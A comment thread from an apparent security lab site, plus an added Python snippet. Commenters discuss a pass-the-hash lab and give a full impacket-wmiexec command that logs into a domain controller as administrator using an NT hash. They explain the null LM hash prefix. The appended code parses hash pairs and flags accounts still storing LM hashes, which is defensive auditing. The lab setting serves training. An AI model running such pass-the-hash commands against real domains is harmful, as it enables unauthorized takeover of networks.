steven
Silver II
3 days ago
Was a nice lab. I struggled quite a bit because I got a golden ticket (pass-the-hash) but wasn't able to access \\DC\c$.
But then I changed to another strategy, and instead of psexec I used:
impacket-wmiexec -dc-ip <DC ip> -target-ip <DC ip> administrator@<DC ip> -hashes aad3b435b51404eeaad3b435b51404ee:2c9299e44ee3abcf5c6f9e7938123334
Maybe to explain why the hash has an added 'aad3b435b51404eeaad3b435b51404ee':
Most newer Windows versions do not store passwords in LM format by default, and the string aad3b435b51404eeaad3b435b51404ee, called the Null LM hash, signifies that it is empty. So we need to add it.
StefanApostol
Immerser
3 days ago
Hi! Glad you liked it. Also, for impacket tools, you don't need to add the empty LM hash; you can simply use :2c9299e44ee3abcf5c6f9e7938123334 (notice the ":" is still there).
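The two hash forms discussed in the comments above, as an added example that is not part of either comment: a small parser that treats "LM:NT" and ":NT" as equivalent and, from the defender's side, flags accounts in an audit dump that still store a real LM hash. The pwdump-style line layout (user:rid:LM:NT:::), the account names and the non-null LM value are constructed assumptions.

```python
import re

# Constant quoted in the thread: the LM half when no LM hash is stored.
NULL_LM = "aad3b435b51404eeaad3b435b51404ee"
_HEX32 = re.compile(r"[0-9a-f]{32}")

# Constructed sample in pwdump-style layout (assumption): user:rid:LM:NT:::
# The NT value is the one from the thread; the second LM value is made up.
SAMPLE_DUMP = """\
administrator:500:aad3b435b51404eeaad3b435b51404ee:2c9299e44ee3abcf5c6f9e7938123334:::
svc_legacy:1105:0123456789abcdef0123456789abcdef:2c9299e44ee3abcf5c6f9e7938123334:::
malformed line without enough fields
"""

def parse_hash_pair(value):
    """Split 'LM:NT' into (lm, nt); the ':NT' shorthand gets NULL_LM as LM.

    Returns lowercase hex and raises ValueError unless each half is 32 hex digits.
    """
    lm, sep, nt = value.strip().lower().partition(":")
    if not sep:
        raise ValueError("expected LM:NT or :NT (the colon is required)")
    lm = lm or NULL_LM  # omitted LM half means "no LM hash"
    for name, half in (("LM", lm), ("NT", nt)):
        if not _HEX32.fullmatch(half):
            raise ValueError(f"{name} half is not 32 hex digits")
    return lm, nt

def accounts_with_lm(dump_text):
    """Return users whose LM field holds a real hash instead of the null placeholder."""
    flagged = []
    for line in dump_text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue  # not a user:rid:LM:NT record
        try:
            lm, _nt = parse_hash_pair(f"{parts[2]}:{parts[3]}")
        except ValueError:
            continue  # skip records with non-hex hash fields
        if lm != NULL_LM:
            flagged.append(parts[0])
    return flagged

if __name__ == "__main__":
    print(parse_hash_pair(":2c9299e44ee3abcf5c6f9e7938123334"))
    print("LM hash still stored for:", accounts_with_lm(SAMPLE_DUMP))
```

Any account this flags still has the weak LM representation on disk, which is worth remediating by disabling LM hash storage and rotating that password.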